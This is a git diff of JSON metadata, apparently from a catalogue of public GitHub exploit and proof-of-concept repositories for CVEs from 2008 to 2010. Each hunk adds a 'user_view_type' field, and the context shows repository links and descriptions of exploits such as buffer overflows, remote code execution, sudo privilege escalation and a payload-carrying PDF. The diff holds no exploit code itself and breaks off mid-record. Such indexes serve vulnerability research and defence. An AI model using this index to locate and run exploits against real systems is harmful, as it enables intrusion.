"login": "followboy1999", "id": 4121091, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4121091?v=4", - "html_url": "https:\/\/github.com\/followboy1999" + "html_url": "https:\/\/github.com\/followboy1999", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/followboy1999\/CVE-2008-7220", "description": null, diff --git a/2009/CVE-2009-0182.json b/2009/CVE-2009-0182.json index c475efab81..6b40661ebd 100644 --- a/2009/CVE-2009-0182.json +++ b/2009/CVE-2009-0182.json @@ -7,7 +7,8 @@ "login": "nobodyatall648", "id": 35725871, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", - "html_url": "https:\/\/github.com\/nobodyatall648" + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2009-0182", "description": "CVE-2009-0182 VUPlayer2.49_LocalBufferOverflow", diff --git a/2009/CVE-2009-0229.json b/2009/CVE-2009-0229.json index d4701b078c..c00d5c153c 100644 --- a/2009/CVE-2009-0229.json +++ b/2009/CVE-2009-0229.json @@ -7,7 +7,8 @@ "login": "zveriu", "id": 3428446, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3428446?v=4", - "html_url": "https:\/\/github.com\/zveriu" + "html_url": "https:\/\/github.com\/zveriu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zveriu\/CVE-2009-0229-PoC", "description": "PoC for CVE-2009-0229 \"Print Spooler Read File Vulnerability\" LPE AFR (related to CVE-2020-1048)", diff --git a/2009/CVE-2009-0347.json b/2009/CVE-2009-0347.json index 9c16e50352..00ffd9c731 100644 --- a/2009/CVE-2009-0347.json +++ b/2009/CVE-2009-0347.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2009-0347", "description": "Autonomy Ultraseek - Open Redirect", diff --git a/2009/CVE-2009-0473.json b/2009/CVE-2009-0473.json index d27a7ced92..223b937db7 100644 --- a/2009/CVE-2009-0473.json +++ b/2009/CVE-2009-0473.json @@ -7,7 +7,8 @@ "login": "akbarq", "id": 7432727, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7432727?v=4", - "html_url": "https:\/\/github.com\/akbarq" + "html_url": "https:\/\/github.com\/akbarq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akbarq\/CVE-2009-0473-check", "description": "Simple script to exploit open redirection vulnerability in Rockwell ControlLogix 1756-ENBT\/A", diff --git a/2009/CVE-2009-0689.json b/2009/CVE-2009-0689.json index 8ffe3cbbfa..533cdbe42e 100644 --- a/2009/CVE-2009-0689.json +++ b/2009/CVE-2009-0689.json @@ -7,7 +7,8 @@ "login": "Fullmetal5", "id": 3742968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3742968?v=4", - "html_url": "https:\/\/github.com\/Fullmetal5" + "html_url": "https:\/\/github.com\/Fullmetal5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Fullmetal5\/str2hax", "description": "An implementation of CVE-2009-0689 for the Nintendo Wii.", diff --git a/2009/CVE-2009-1151.json b/2009/CVE-2009-1151.json index 17d9e71c2b..82223d4080 100644 --- a/2009/CVE-2009-1151.json +++ b/2009/CVE-2009-1151.json @@ -7,7 +7,8 @@ "login": "pagvac", "id": 6169628, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6169628?v=4", - "html_url": "https:\/\/github.com\/pagvac" + "html_url": "https:\/\/github.com\/pagvac", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/pagvac\/pocs", "description": "phpMyAdmin '\/scripts\/setup.php' PHP Code Injection RCE PoC (CVE-2009-1151)", @@ -37,7 +38,8 @@ "login": "e-Thug", "id": 89600679, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89600679?v=4", - "html_url": "https:\/\/github.com\/e-Thug" + "html_url": "https:\/\/github.com\/e-Thug", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/e-Thug\/PhpMyAdmin", "description": "Based on the x.pl exploit\/loader script for CVE-2009-1151", diff --git a/2009/CVE-2009-1244.json b/2009/CVE-2009-1244.json index 547e06500f..c5ed4ca9e8 100644 --- a/2009/CVE-2009-1244.json +++ b/2009/CVE-2009-1244.json @@ -7,7 +7,8 @@ "login": "piotrbania", "id": 51699228, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51699228?v=4", - "html_url": "https:\/\/github.com\/piotrbania" + "html_url": "https:\/\/github.com\/piotrbania", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/piotrbania\/vmware_exploit_pack_CVE-2009-1244", "description": "vmware cloudburst exploit CVE-2009-1244", diff --git a/2009/CVE-2009-1324.json b/2009/CVE-2009-1324.json index 1861ea73e4..dea0fccecb 100644 --- a/2009/CVE-2009-1324.json +++ b/2009/CVE-2009-1324.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-1324", "description": "CVE-2009-1324 - ASX to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3", diff --git a/2009/CVE-2009-1330.json b/2009/CVE-2009-1330.json index 12855e61e6..90b3dc2ecb 100644 --- a/2009/CVE-2009-1330.json +++ b/2009/CVE-2009-1330.json @@ -7,7 +7,8 @@ "login": "adenkiewicz", "id": 1060275, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", - "html_url": "https:\/\/github.com\/adenkiewicz" + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2009-1330", "description": "Simple exploit for Easy RM to MP3 Converter 2.7.3.700 on Windows 7 32b.", @@ -37,7 +38,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-1330", "description": "CVE-2009-1330 - Easy RM to MP3 Converter Local Buffer Overflow. Tested on Windows XP Professional SP3", @@ -67,7 +69,8 @@ "login": "exploitwritter", "id": 47488127, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4", - "html_url": "https:\/\/github.com\/exploitwritter" + "html_url": "https:\/\/github.com\/exploitwritter", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2009-1330_EasyRMToMp3Converter", "description": "Easy RM to MP3 Converter es un software que sufre de una vulnerabiliad de desbordamiento de buffer basada en la pila o StackBufferOverflow lo cual puede permite a los atacantes remotos ejecutar código arbitrario a través de un nombre de archivo largo en un archivo de lista de reproducción (.pls)", diff --git a/2009/CVE-2009-1437.json b/2009/CVE-2009-1437.json index a7d98c1f30..be60830938 100644 --- a/2009/CVE-2009-1437.json +++ b/2009/CVE-2009-1437.json @@ -7,7 +7,8 @@ "login": "HanseSecure", "id": 24669088, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24669088?v=4", - "html_url": "https:\/\/github.com\/HanseSecure" + "html_url": "https:\/\/github.com\/HanseSecure", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HanseSecure\/CVE-2009-1437", "description": null, diff --git a/2009/CVE-2009-1904.json b/2009/CVE-2009-1904.json index 572aa57555..beeb84b7ee 100644 --- a/2009/CVE-2009-1904.json +++ b/2009/CVE-2009-1904.json @@ -7,7 +7,8 @@ "login": "NZKoz", "id": 197, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/197?v=4", - "html_url": "https:\/\/github.com\/NZKoz" + "html_url": "https:\/\/github.com\/NZKoz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NZKoz\/bigdecimal-segfault-fix", "description": "Provides a quick workaround for the segfault bug in Ruby (CVE-2009-1904)", diff --git a/2009/CVE-2009-2265.json b/2009/CVE-2009-2265.json index 7743c537a1..3942f90c66 100644 --- a/2009/CVE-2009-2265.json +++ b/2009/CVE-2009-2265.json @@ -7,7 +7,8 @@ "login": "zaphoxx", "id": 22231720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22231720?v=4", - "html_url": "https:\/\/github.com\/zaphoxx" + "html_url": "https:\/\/github.com\/zaphoxx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zaphoxx\/zaphoxx-coldfusion", "description": "coldfusion exploit based on https:\/\/cvedetails.com\/cve\/CVE-2009-2265\/", @@ -37,7 +38,8 @@ "login": "NyxByt3", "id": 66146701, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66146701?v=4", - "html_url": "https:\/\/github.com\/NyxByt3" + "html_url": "https:\/\/github.com\/NyxByt3", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/NyxByt3\/CVE-2009-2265", "description": null, @@ -67,7 +69,8 @@ "login": "p1ckzi", "id": 44880203, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", - "html_url": "https:\/\/github.com\/p1ckzi" + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2009-2265", "description": "cf8-upload.py | CVE-2009-2265", @@ -104,7 +107,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2009-2265", "description": "ColdFusion 8.0.1 - Arbitrary File Upload to RCE", diff --git a/2009/CVE-2009-2692.json b/2009/CVE-2009-2692.json index beb2649d2b..07e0abe92d 100644 --- a/2009/CVE-2009-2692.json +++ b/2009/CVE-2009-2692.json @@ -7,7 +7,8 @@ "login": "jdvalentini", "id": 37914711, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37914711?v=4", - "html_url": "https:\/\/github.com\/jdvalentini" + "html_url": "https:\/\/github.com\/jdvalentini", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jdvalentini\/CVE-2009-2692", "description": "Linux Null pointer dereference", diff --git a/2009/CVE-2009-2698.json b/2009/CVE-2009-2698.json index 2e0fa97df0..3d52d3f160 100644 --- a/2009/CVE-2009-2698.json +++ b/2009/CVE-2009-2698.json @@ -7,7 +7,8 @@ "login": "xiaoxiaoleo", "id": 9813186, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9813186?v=4", - "html_url": "https:\/\/github.com\/xiaoxiaoleo" + "html_url": "https:\/\/github.com\/xiaoxiaoleo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xiaoxiaoleo\/CVE-2009-2698", "description": "CVE-2009-2698 compiled for CentOS 4.8", diff --git a/2009/CVE-2009-3036.json b/2009/CVE-2009-3036.json index 2d873ecf77..c04f5850d9 100644 --- a/2009/CVE-2009-3036.json +++ b/2009/CVE-2009-3036.json @@ -7,7 +7,8 @@ "login": "brinhosa", "id": 1003952, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1003952?v=4", - "html_url": "https:\/\/github.com\/brinhosa" + "html_url": "https:\/\/github.com\/brinhosa", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/brinhosa\/CVE-2009-3036", "description": null, diff --git a/2009/CVE-2009-3103.json b/2009/CVE-2009-3103.json index 3b3a3d6aef..22222078af 100644 --- a/2009/CVE-2009-3103.json +++ b/2009/CVE-2009-3103.json @@ -7,7 +7,8 @@ "login": "sooklalad", "id": 16028654, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16028654?v=4", - "html_url": "https:\/\/github.com\/sooklalad" + "html_url": "https:\/\/github.com\/sooklalad", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sooklalad\/ms09050", "description": "cve-2009-3103", @@ -37,7 +38,8 @@ "login": "sec13b", "id": 123419537, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123419537?v=4", - "html_url": "https:\/\/github.com\/sec13b" + "html_url": "https:\/\/github.com\/sec13b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sec13b\/ms09-050_CVE-2009-3103", "description": "CVE-2009-3103 ms09-050", @@ -67,7 +69,8 @@ "login": "Sic4rio", "id": 75425513, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75425513?v=4", - "html_url": "https:\/\/github.com\/Sic4rio" + "html_url": "https:\/\/github.com\/Sic4rio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sic4rio\/CVE-2009-3103---srv2.sys-SMB-Code-Execution-Python-MS09-050-", "description": "Microsoft Windows - 'srv2.sys' SMB Code Execution (Python) (MS09-050)", diff --git a/2009/CVE-2009-3555.json b/2009/CVE-2009-3555.json index ceee9e9460..a19580d27b 100644 --- a/2009/CVE-2009-3555.json +++ b/2009/CVE-2009-3555.json @@ -7,7 +7,8 @@ "login": "johnwchadwick", "id": 86682572, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86682572?v=4", - "html_url": "https:\/\/github.com\/johnwchadwick" + "html_url": "https:\/\/github.com\/johnwchadwick", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/johnwchadwick\/cve-2009-3555-test-server", "description": "A TLS server using a vendored fork of the Go TLS stack that has renegotation indication extension forcibly disabled.", diff --git a/2009/CVE-2009-4049.json b/2009/CVE-2009-4049.json index c9d2df26ff..489016e854 100644 --- a/2009/CVE-2009-4049.json +++ b/2009/CVE-2009-4049.json @@ -7,7 +7,8 @@ "login": "fengjixuchui", "id": 2487206, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", - "html_url": "https:\/\/github.com\/fengjixuchui" + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2009-4049", "description": "Heap-based buffer overflow in aswRdr.sys (aka the TDI RDR driver) in avast! Home and Professional 4.8.1356.0 allows local users to cause a denial of service (memory corruption) or possibly gain privileges via crafted arguments to IOCTL 0x80002024.", diff --git a/2009/CVE-2009-4092.json b/2009/CVE-2009-4092.json index 1dc6d50aa0..e035972015 100644 --- a/2009/CVE-2009-4092.json +++ b/2009/CVE-2009-4092.json @@ -7,7 +7,8 @@ "login": "xiaoyu-iid", "id": 22065479, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22065479?v=4", - "html_url": "https:\/\/github.com\/xiaoyu-iid" + "html_url": "https:\/\/github.com\/xiaoyu-iid", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xiaoyu-iid\/Simplog-Exploit", "description": "Setup, exploit and patch for CVE-2009-4092 Simplog CSRF", diff --git a/2009/CVE-2009-4118.json b/2009/CVE-2009-4118.json index 40abbeb67b..8462bff4a6 100644 --- a/2009/CVE-2009-4118.json +++ b/2009/CVE-2009-4118.json @@ -7,7 +7,8 @@ "login": "alt3kx", "id": 3140111, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3140111?v=4", - "html_url": "https:\/\/github.com\/alt3kx" + "html_url": "https:\/\/github.com\/alt3kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/alt3kx\/CVE-2009-4118", "description": "Cisco VPN Client - Integer Overflow Denial of Service", diff --git a/2009/CVE-2009-4137.json b/2009/CVE-2009-4137.json index 99c156e071..57ac37fcc4 100644 --- a/2009/CVE-2009-4137.json +++ b/2009/CVE-2009-4137.json @@ -7,7 +7,8 @@ "login": "Alexeyan", "id": 6674109, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6674109?v=4", - "html_url": "https:\/\/github.com\/Alexeyan" + "html_url": "https:\/\/github.com\/Alexeyan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Alexeyan\/CVE-2009-4137", "description": "Exploit for piwik CVE-2009-4140 RCE", diff --git a/2009/CVE-2009-4623.json b/2009/CVE-2009-4623.json index bd6f8bb876..384e7e0cf3 100644 --- a/2009/CVE-2009-4623.json +++ b/2009/CVE-2009-4623.json @@ -7,7 +7,8 @@ "login": "hupe1980", "id": 24973437, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24973437?v=4", - "html_url": "https:\/\/github.com\/hupe1980" + "html_url": "https:\/\/github.com\/hupe1980", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hupe1980\/CVE-2009-4623", "description": "Advanced Comment System 1.0 - Remote Command Execution (RCE) ", @@ -39,7 +40,8 @@ "login": "kernel-cyber", "id": 21226709, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21226709?v=4", - "html_url": "https:\/\/github.com\/kernel-cyber" + "html_url": "https:\/\/github.com\/kernel-cyber", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kernel-cyber\/CVE-2009-4623", "description": null, @@ -69,7 +71,8 @@ "login": "MonsempesSamuel", "id": 45665836, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45665836?v=4", - "html_url": "https:\/\/github.com\/MonsempesSamuel" + "html_url": "https:\/\/github.com\/MonsempesSamuel", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MonsempesSamuel\/CVE-2009-4623", "description": "Remote shell on CVE-2009-4623", diff --git a/2009/CVE-2009-4660.json b/2009/CVE-2009-4660.json index 91f2ea2ecc..5e3b511d56 100644 --- a/2009/CVE-2009-4660.json +++ b/2009/CVE-2009-4660.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2009-4660", "description": "CVE-2009-4660 - BigAnt Server 2.52 'USV' Remote Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2009/CVE-2009-5147.json b/2009/CVE-2009-5147.json index 62a3b8ae71..f72eb7e084 100644 --- a/2009/CVE-2009-5147.json +++ b/2009/CVE-2009-5147.json @@ -7,7 +7,8 @@ "login": "vpereira", "id": 37418, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37418?v=4", - "html_url": "https:\/\/github.com\/vpereira" + "html_url": "https:\/\/github.com\/vpereira", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vpereira\/CVE-2009-5147", "description": "poc for CVE-2009-5147", @@ -37,7 +38,8 @@ "login": "zhangyongbo100", "id": 49974023, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49974023?v=4", - "html_url": "https:\/\/github.com\/zhangyongbo100" + "html_url": "https:\/\/github.com\/zhangyongbo100", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zhangyongbo100\/-Ruby-dl-handle.c-CVE-2009-5147-", "description": null, diff --git a/2010/CVE-2010-0219.json b/2010/CVE-2010-0219.json index 47a7d31da6..bc3c47f550 100644 --- a/2010/CVE-2010-0219.json +++ b/2010/CVE-2010-0219.json @@ -7,7 +7,8 @@ "login": "veritas-rt", "id": 50308392, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50308392?v=4", - "html_url": "https:\/\/github.com\/veritas-rt" + "html_url": "https:\/\/github.com\/veritas-rt", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/veritas-rt\/CVE-2010-0219", "description": null, diff --git a/2010/CVE-2010-0232.json b/2010/CVE-2010-0232.json index 7b34e46101..5b02d1a44f 100644 --- a/2010/CVE-2010-0232.json +++ b/2010/CVE-2010-0232.json @@ -7,7 +7,8 @@ "login": "azorfus", "id": 72391760, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72391760?v=4", - "html_url": "https:\/\/github.com\/azorfus" + "html_url": "https:\/\/github.com\/azorfus", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/azorfus\/CVE-2010-0232", "description": "Development of an exploit for privilege escalation in Windows systems ( NT \/ 2k \/ XP \/ 2K3 \/ VISTA \/ 2k8 \/ 7 ) using the vulnerability CVE-2010-0232", diff --git a/2010/CVE-2010-0426.json b/2010/CVE-2010-0426.json index ff7a7f065d..1f8d880e08 100644 --- a/2010/CVE-2010-0426.json +++ b/2010/CVE-2010-0426.json @@ -7,7 +7,8 @@ "login": "t0kx", "id": 24924517, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24924517?v=4", - "html_url": "https:\/\/github.com\/t0kx" + "html_url": "https:\/\/github.com\/t0kx", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/t0kx\/privesc-CVE-2010-0426", "description": "Sudo 1.6.x <= 1.6.9p21 and 1.7.x <= 1.7.2p4 Local Privilege Escalation and vulnerable container", @@ -44,7 +45,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2010-0426", "description": "cve-2010-0426", @@ -74,7 +76,8 @@ "login": "g1vi", "id": 120142960, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", - "html_url": "https:\/\/github.com\/g1vi" + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/g1vi\/CVE-2010-0426", "description": "sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4 - Privilege escalation with sudo and sudoedit", diff --git a/2010/CVE-2010-0738.json b/2010/CVE-2010-0738.json index c239bba8ff..173ced9021 100644 --- a/2010/CVE-2010-0738.json +++ b/2010/CVE-2010-0738.json @@ -7,7 +7,8 @@ "login": "ChristianPapathanasiou", "id": 5354349, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5354349?v=4", - "html_url": "https:\/\/github.com\/ChristianPapathanasiou" + "html_url": "https:\/\/github.com\/ChristianPapathanasiou", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ChristianPapathanasiou\/jboss-autopwn", "description": "JBoss Autopwn as featured at BlackHat Europe 2010 - this version incorporates CVE-2010-0738 the JBoss authentication bypass VERB manipulation vulnerability as discovered by Minded Security", @@ -37,7 +38,8 @@ "login": "gitcollect", "id": 17906239, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17906239?v=4", - "html_url": "https:\/\/github.com\/gitcollect" + "html_url": "https:\/\/github.com\/gitcollect", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gitcollect\/jboss-autopwn", "description": "JBoss Autopwn CVE-2010-0738 JBoss authentication bypass ", diff --git a/2010/CVE-2010-1205.json b/2010/CVE-2010-1205.json index 28f364788b..215f7943af 100644 --- a/2010/CVE-2010-1205.json +++ b/2010/CVE-2010-1205.json @@ -7,7 +7,8 @@ "login": "mk219533", "id": 91629, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91629?v=4", - "html_url": "https:\/\/github.com\/mk219533" + "html_url": "https:\/\/github.com\/mk219533", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mk219533\/CVE-2010-1205", "description": "sample exploit of buffer overflow in libpng ", diff --git a/2010/CVE-2010-1240.json b/2010/CVE-2010-1240.json index beacda6453..92a46965c8 100644 --- a/2010/CVE-2010-1240.json +++ b/2010/CVE-2010-1240.json @@ -7,7 +7,8 @@ "login": "Jasmoon99", "id": 45911474, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45911474?v=4", - "html_url": "https:\/\/github.com\/Jasmoon99" + "html_url": "https:\/\/github.com\/Jasmoon99", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jasmoon99\/Embedded-PDF", "description": "This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. ", @@ -37,7 +38,8 @@ "login": "omarothmann", "id": 43515806, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43515806?v=4", - "html_url": "https:\/\/github.com\/omarothmann" + "html_url": "https:\/\/github.com\/omarothmann", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/omarothmann\/Embedded-Backdoor-Connection", "description": "This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240.", @@ -67,7 +69,8 @@ "login": "asepsaepdin", "id": 122620685, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/122620685?v=4", - "html_url": "https:\/\/github.com\/asepsaepdin" + "html_url": "https:\/\/github.com\/asepsaepdin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/asepsaepdin\/CVE-2010-1240", "description": null, diff --git a/2010/CVE-2010-1411.json b/2010/CVE-2010-1411.json index c62934d65f..ac18755f95 100644 --- a/2010/CVE-2010-1411.json +++ b/2010/CVE-2010-1411.json @@ -7,7 +7,8 @@ "login": "MAVProxyUser", "id": 2904396, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2904396?v=4", - "html_url": "https:\/\/github.com\/MAVProxyUser" + "html_url": "https:\/\/github.com\/MAVProxyUser", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MAVProxyUser\/httpfuzz-robomiller", "description": "Dumb Fuzzer used to find CVE-2010-1411 ", diff --git a/2010/CVE-2010-1622.json b/2010/CVE-2010-1622.json index 0ec72635b5..25e2929bc0 100644 --- a/2010/CVE-2010-1622.json +++ b/2010/CVE-2010-1622.json @@ -7,7 +7,8 @@ "login": "DDuarte", "id": 530940, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/530940?v=4", - "html_url": "https:\/\/github.com\/DDuarte" + "html_url": "https:\/\/github.com\/DDuarte", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/DDuarte\/springshell-rce-poc", "description": "CVE-2022-22965 - CVE-2010-1622 redux", @@ -42,7 +43,8 @@ "login": "strainerart", "id": 16163685, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16163685?v=4", - "html_url": "https:\/\/github.com\/strainerart" + "html_url": "https:\/\/github.com\/strainerart", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/strainerart\/Spring4Shell", "description": "Threat Intelligence on Zero-Day for Spring4Shell (CVE-2010-1622)", @@ -72,7 +74,8 @@ "login": "HandsomeCat00", "id": 45387035, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45387035?v=4", - "html_url": "https:\/\/github.com\/HandsomeCat00" + "html_url": "https:\/\/github.com\/HandsomeCat00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/HandsomeCat00\/Spring-CVE-2010-1622", "description": "Spring-CVE-2010-1622", @@ -102,7 +105,8 @@ "login": "E-bounce", "id": 44311693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44311693?v=4", - "html_url": "https:\/\/github.com\/E-bounce" + "html_url": "https:\/\/github.com\/E-bounce", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/E-bounce\/cve-2010-1622_learning_environment", "description": "cve-2010-1622 Learning Environment", diff --git a/2010/CVE-2010-1938.json b/2010/CVE-2010-1938.json index 612b2ff4c1..46f37cd64e 100644 --- a/2010/CVE-2010-1938.json +++ b/2010/CVE-2010-1938.json @@ -7,7 +7,8 @@ "login": "Nexxus67", "id": 58827641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58827641?v=4", - "html_url": "https:\/\/github.com\/Nexxus67" + "html_url": "https:\/\/github.com\/Nexxus67", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Nexxus67\/cve-2010-1938", "description": "A simple Python script to test an off-by-one vulnerability in the OPIE library (CVE-2010-1938). This vulnerability affects certain FTP servers and may allow for Denial of Service (DoS) or arbitrary code execution.", diff --git a/2010/CVE-2010-2075.json b/2010/CVE-2010-2075.json index 4d3f2e4eaa..36d9b87188 100644 --- a/2010/CVE-2010-2075.json +++ b/2010/CVE-2010-2075.json @@ -7,7 +7,8 @@ "login": "MFernstrom", "id": 9220603, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9220603?v=4", - "html_url": "https:\/\/github.com\/MFernstrom" + "html_url": "https:\/\/github.com\/MFernstrom", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MFernstrom\/OffensivePascal-CVE-2010-2075", "description": "FreePascal implementation of the UnrealIRCD CVE-2010-2075", @@ -37,7 +38,8 @@ "login": "chancej715", "id": 57548476, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57548476?v=4", - "html_url": "https:\/\/github.com\/chancej715" + "html_url": "https:\/\/github.com\/chancej715", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/chancej715\/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution", "description": "UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075).", @@ -67,7 +69,8 @@ "login": "FredBrave", "id": 114189847, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/114189847?v=4", - "html_url": "https:\/\/github.com\/FredBrave" + "html_url": "https:\/\/github.com\/FredBrave", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FredBrave\/CVE-2010-2075-UnrealIRCd-3.2.8.1", "description": "Exploit for CVE:2010-2075. This exploit allows remote command execution in UnrealIRCd 3.2.8.1.", @@ -97,7 +100,8 @@ "login": "JoseLRC97", "id": 56311988, 